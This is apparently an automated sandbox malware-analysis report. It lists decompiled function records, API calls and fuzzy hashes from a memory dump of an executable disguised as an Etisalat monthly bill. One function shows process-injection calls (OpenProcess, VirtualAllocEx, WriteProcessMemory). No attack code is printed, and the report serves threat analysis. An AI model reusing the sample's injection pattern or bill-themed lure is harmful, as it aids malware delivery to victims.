Instruction Fuzzy Hash: B621D1726492809FDB228F29EC55AE53F60FB16331B08019DE7D2DB2B2C7364981DB10

Function 00905711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00905726
_memcmp.LIBVCRUNTIME ref: 00905744
_memcmp.LIBVCRUNTIME ref: 00905757
_memcmp.LIBVCRUNTIME ref: 0090576F
_memcmp.LIBVCRUNTIME ref: 00905787

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 46e7530d65647f6d141438e2cf599ae2dd55a709ede3c7d144740670fa7b68e0
Instruction ID: cc7eac5dbc1e8b010a631e68eb5a12d3cb08eba7efc81f0565333045649f8cdb
Opcode Fuzzy Hash: 46e7530d65647f6d141438e2cf599ae2dd55a709ede3c7d144740670fa7b68e0
Instruction Fuzzy Hash: 0201B9A1681605BFD71855249E96FBB736DEF6239CF014024FD08DA2C2F774EE10AAA1

Function 008D2DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,008CF2DE,008D3863,00971444,?,008BFDF5,?,?,008AA976,00000010,00971440,008A13FC,?,008A13C6), ref: 008D2DFD
_free.LIBCMT ref: 008D2E32
_free.LIBCMT ref: 008D2E59
SetLastError.KERNEL32(00000000,008A1129), ref: 008D2E66
SetLastError.KERNEL32(00000000,008A1129), ref: 008D2E6F

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 3bf8fe125f31aa41e03230b869e4e0ee499e1d56b75b2947b6aa652e83ecc5a6
Instruction ID: 46c76a60386301cf038ec66e64d245822e9498511f3c71475acaacee1fe96fe0
Opcode Fuzzy Hash: 3bf8fe125f31aa41e03230b869e4e0ee499e1d56b75b2947b6aa652e83ecc5a6
Instruction Fuzzy Hash: 4C01F472609A006BC61267386C45E2B2759FBF13B6B25472BF425E33D3EBB0CC016122

Function 0090000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,008FFF41,80070057,?,?,?,0090035E), ref: 0090002B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,008FFF41,80070057,?,?), ref: 00900046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,008FFF41,80070057,?,?), ref: 00900054
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,008FFF41,80070057,?), ref: 00900064
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,008FFF41,80070057,?,?), ref: 00900070

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 362df0e0339734f6e7d2121ceb2a69d1f2ba7b62b4f087e74ad0129632ff6226
Instruction ID: 2aba48274c6fe5fa54fd22abe1c7681d8aae7f7199fbeadb6488e261cd537492
Opcode Fuzzy Hash: 362df0e0339734f6e7d2121ceb2a69d1f2ba7b62b4f087e74ad0129632ff6226
Instruction Fuzzy Hash: C801A2B6610604BFDB104F68DC08BAA7AFDEF84791F144124F905E2250DB75DE40DBA0

Function 0090E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 0090E997
QueryPerformanceFrequency.KERNEL32(?), ref: 0090E9A5
Sleep.KERNEL32(00000000), ref: 0090E9AD
QueryPerformanceCounter.KERNEL32(?), ref: 0090E9B7
Sleep.KERNEL32 ref: 0090E9F3

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: a7eda483eb58c66cd5bd608ae74acdebbfd121ab8b8219faa6ffd3eb09c9cd6d
Instruction ID: 699a86768726dea1dd7bca041aa6344fdfbe7a2c0695706a42a911e225120f9b
Opcode Fuzzy Hash: a7eda483eb58c66cd5bd608ae74acdebbfd121ab8b8219faa6ffd3eb09c9cd6d
Instruction Fuzzy Hash: 05015771C09A2DDFCF00ABE5D849AEDBB78FB09301F000946E512B2290CB349650ABA1

Function 009010F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00901114
GetLastError.KERNEL32(?,00000000,00000000,?,?,00900B9B,?,?,?), ref: 00901120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00900B9B,?,?,?), ref: 0090112F
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00900B9B,?,?,?), ref: 00901136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0090114D

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 1e77497275e2f6dc8428e545c46e470a62ee5470ba0b325a5a6cc32553dd93b0
Instruction ID: d1105a821413b499e34c3bc10b3639dbc91740d9b8d5ea9549bd3990393eb419
Opcode Fuzzy Hash: 1e77497275e2f6dc8428e545c46e470a62ee5470ba0b325a5a6cc32553dd93b0
Instruction Fuzzy Hash: FB0119B5214615BFDB154FA5DC49A6A3B6EEF893A0B204419FA45E73A0DB31DC00AF60

Function 00900FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00900FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00900FD6
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00900FE5
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00900FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00901002

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: c918651e07f71c7d6fd7faaeb7d7f4067a241c8dee2e25b33393193188589e1c
Instruction ID: 0dc1237d26d594aa47392153fc4e5dec0913fefe95286d9ae08cd031d879c2cc
Opcode Fuzzy Hash: c918651e07f71c7d6fd7faaeb7d7f4067a241c8dee2e25b33393193188589e1c
Instruction Fuzzy Hash: 2DF049B5214701AFDB224FA49C49F563BADEF89762F104414FA85E72A1CA70DC50AF60

Function 00901014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0090102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00901036
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00901045
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0090104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00901062

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 96c2ed976fa3eeacd162d0404c739a6c52b412db2d85061cbdda08f537fa1bc0
Instruction ID: 18970afcc610d3e14b844a97e517afa91fc01eab594285f44f220973c79c9eb2
Opcode Fuzzy Hash: 96c2ed976fa3eeacd162d0404c739a6c52b412db2d85061cbdda08f537fa1bc0
Instruction Fuzzy Hash: ABF06DB5214701EFDB215FA4EC49F563BADEF89B61F100414FA85E7290CA70D850AF60

Function 0091030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,0091017D,?,009132FC,?,00000001,008E2592,?), ref: 00910324
CloseHandle.KERNEL32(?,?,?,?,0091017D,?,009132FC,?,00000001,008E2592,?), ref: 00910331
CloseHandle.KERNEL32(?,?,?,?,0091017D,?,009132FC,?,00000001,008E2592,?), ref: 0091033E
CloseHandle.KERNEL32(?,?,?,?,0091017D,?,009132FC,?,00000001,008E2592,?), ref: 0091034B
CloseHandle.KERNEL32(?,?,?,?,0091017D,?,009132FC,?,00000001,008E2592,?), ref: 00910358
CloseHandle.KERNEL32(?,?,?,?,0091017D,?,009132FC,?,00000001,008E2592,?), ref: 00910365

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 8e31735e56c5c1e74a90c26e15472e798bbd5a29463b21347815cd9021d6a295
Instruction ID: 095103d8820fea49e929da173605c66b57ecf5c5cb6b60cdf20857c5a38ccc1a
Opcode Fuzzy Hash: 8e31735e56c5c1e74a90c26e15472e798bbd5a29463b21347815cd9021d6a295
Instruction Fuzzy Hash: 4F01A272900B199FCB30AF66D880452F7F9BF903153158A3FD1A652931C3B2A996DF80

Function 008DD73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 008DD752

Part of subcall function 008D29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,008DD7D1,00000000,00000000,00000000,00000000,?,008DD7F8,00000000,00000007,00000000,?,008DDBF5,00000000), ref: 008D29DE
Part of subcall function 008D29C8: GetLastError.KERNEL32(00000000,?,008DD7D1,00000000,00000000,00000000,00000000,?,008DD7F8,00000000,00000007,00000000,?,008DDBF5,00000000,00000000), ref: 008D29F0

_free.LIBCMT ref: 008DD764
_free.LIBCMT ref: 008DD776
_free.LIBCMT ref: 008DD788
_free.LIBCMT ref: 008DD79A

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f49a117e7ac33b176f56ff38ba67176f8f639de35c2b9d3088060688170e9830
Instruction ID: 979a293d8cc32564ba72f73aad0cfcd8a989916de26bd1a7a2f97fc58eb7e340
Opcode Fuzzy Hash: f49a117e7ac33b176f56ff38ba67176f8f639de35c2b9d3088060688170e9830
Instruction Fuzzy Hash: 3AF06272554304BB8625FB68F9C1D267BDDFB44310B940A4BF098D7701C730FC80AA61

Function 00905C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00905C58
GetWindowTextW.USER32(00000000,?,00000100), ref: 00905C6F
MessageBeep.USER32(00000000), ref: 00905C87
KillTimer.USER32(?,0000040A), ref: 00905CA3
EndDialog.USER32(?,00000001), ref: 00905CBD

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 8bbe411ee2846fa80fbbd1a8ca129cb0c98f2e03f81eda8746239c23be18ca9f
Instruction ID: d06f18121d98c0fc6f2eb90f409d6a737d3780f1917523a406023caba6b34051
Opcode Fuzzy Hash: 8bbe411ee2846fa80fbbd1a8ca129cb0c98f2e03f81eda8746239c23be18ca9f
Instruction Fuzzy Hash: DF01D171500B14AFFB205B10DE4FFA67BB8BB00B09F011559E583B10E0DBF4A9849F90

Function 008D22A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 008D22BE

Part of subcall function 008D29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,008DD7D1,00000000,00000000,00000000,00000000,?,008DD7F8,00000000,00000007,00000000,?,008DDBF5,00000000), ref: 008D29DE
Part of subcall function 008D29C8: GetLastError.KERNEL32(00000000,?,008DD7D1,00000000,00000000,00000000,00000000,?,008DD7F8,00000000,00000007,00000000,?,008DDBF5,00000000,00000000), ref: 008D29F0

_free.LIBCMT ref: 008D22D0
_free.LIBCMT ref: 008D22E3
_free.LIBCMT ref: 008D22F4
_free.LIBCMT ref: 008D2305

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: c758d4507e970a031c42e304d28cce0ebfde3c6a6aef565e83ecf80d71a707ff
Instruction ID: d07eaa8655b1b0bf172b208b6c25ed50ee288356b6d2d7ff21ab6f011108293f
Opcode Fuzzy Hash: c758d4507e970a031c42e304d28cce0ebfde3c6a6aef565e83ecf80d71a707ff
Instruction Fuzzy Hash: 67F0D0B64291109BC622BF6CBC11D583F65F72CB51745064BF418D7372CB710591BBA5

Function 008B95C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 008B95D4
StrokeAndFillPath.GDI32(?,?,008F71F7,00000000,?,?,?), ref: 008B95F0
SelectObject.GDI32(?,00000000), ref: 008B9603
DeleteObject.GDI32 ref: 008B9616
StrokePath.GDI32(?), ref: 008B9631

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 42c200347a3e5b7f4c8ba2b31d50a930ee7698bcec92fd86015795a363b1c5b6
Instruction ID: fc58a768d9a7e59905463722601aa4371eb2de4b1ef1aa6db02611cce1330f94
Opcode Fuzzy Hash: 42c200347a3e5b7f4c8ba2b31d50a930ee7698bcec92fd86015795a363b1c5b6
Instruction Fuzzy Hash: 14F0193602D648EBDB265F69ED1C7A83F61FB11362F048214F669A51F0C7308992FF20

Function 008D0F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 008D10F9
__freea.LIBCMT ref: 008D1117

Part of subcall function 008D1537: _free.LIBCMT ref: 008D154F

Strings

a/p, xrefs: 008D11DE
am/pm, xrefs: 008D117A

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 607a1f304f305a8c0b8d3a3733abe10e084f30f911dbabba2b6cb2ce2aa5661e
Instruction ID: 89b4f002e4fd4eb0442494bb488060f846a3e4c82c7ce36cf46b6b01f78c35ef
Opcode Fuzzy Hash: 607a1f304f305a8c0b8d3a3733abe10e084f30f911dbabba2b6cb2ce2aa5661e
Instruction Fuzzy Hash: 0FD1CF3190020AAADF289F68C85DBBAB7B1FF05704F28435BE905DBB51D7799D80CB91

Function 00927B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 008C0242: EnterCriticalSection.KERNEL32(0097070C,00971884,?,?,008B198B,00972518,?,?,?,008A12F9,00000000), ref: 008C024D
Part of subcall function 008C0242: LeaveCriticalSection.KERNEL32(0097070C,?,008B198B,00972518,?,?,?,008A12F9,00000000), ref: 008C028A

Part of subcall function 008A9CB3: _wcslen.LIBCMT ref: 008A9CBD

Part of subcall function 008C00A3: __onexit.LIBCMT ref: 008C00A9

__Init_thread_footer.LIBCMT ref: 00927BFB

Part of subcall function 008C01F8: EnterCriticalSection.KERNEL32(0097070C,?,?,008B8747,00972514), ref: 008C0202
Part of subcall function 008C01F8: LeaveCriticalSection.KERNEL32(0097070C,?,008B8747,00972514), ref: 008C0235

Strings

Variable must be of type 'Object'., xrefs: 00927C3A
5, xrefs: 00927C78
G, xrefs: 00927C7F

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: 5$G$Variable must be of type 'Object'.
API String ID: 535116098-3733170431
Opcode ID: da5fa6129f632fcd689f049d47db6ec94aba28254f62f994328d6c8a25ad1782
Instruction ID: 8a352c2c2e9b341d1529319ce023f22cd6560aa75bf97cb16fd96c5020e49ed3
Opcode Fuzzy Hash: da5fa6129f632fcd689f049d47db6ec94aba28254f62f994328d6c8a25ad1782
Instruction Fuzzy Hash: 57918A70A04219EFCB14EF98E8919ADB7B5FF45300F108459F846AB3A6DB31AE41CB52

Function 00902716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0090B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009021D0,?,?,00000034,00000800,?,00000034), ref: 0090B42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00902760

Part of subcall function 0090B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009021FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0090B3F8

Part of subcall function 0090B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0090B355
Part of subcall function 0090B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00902194,00000034,?,?,00001004,00000000,00000000), ref: 0090B365
Part of subcall function 0090B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00902194,00000034,?,?,00001004,00000000,00000000), ref: 0090B37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009027CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0090281A

Strings

@, xrefs: 00902832

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 05c0fad8981e2b8401c7c0a3a41eb4aa5f95cd5f9b6a613a876c4bfd5160ec88
Instruction ID: 06126a71050f6bf3fe7829e1f25c21111dc34b82ae198a667e4b77eb1a2a79ec
Opcode Fuzzy Hash: 05c0fad8981e2b8401c7c0a3a41eb4aa5f95cd5f9b6a613a876c4bfd5160ec88
Instruction Fuzzy Hash: 0B414C76901218AFDB10DFA4CD46BEEBBB8EF49300F108095FA55B7191DB706E45CBA1

Function 008D172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe,00000104), ref: 008D1769
_free.LIBCMT ref: 008D1834
_free.LIBCMT ref: 008D183E

Strings

C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe, xrefs: 008D1760, 008D1767, 008D1796, 008D17CE

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
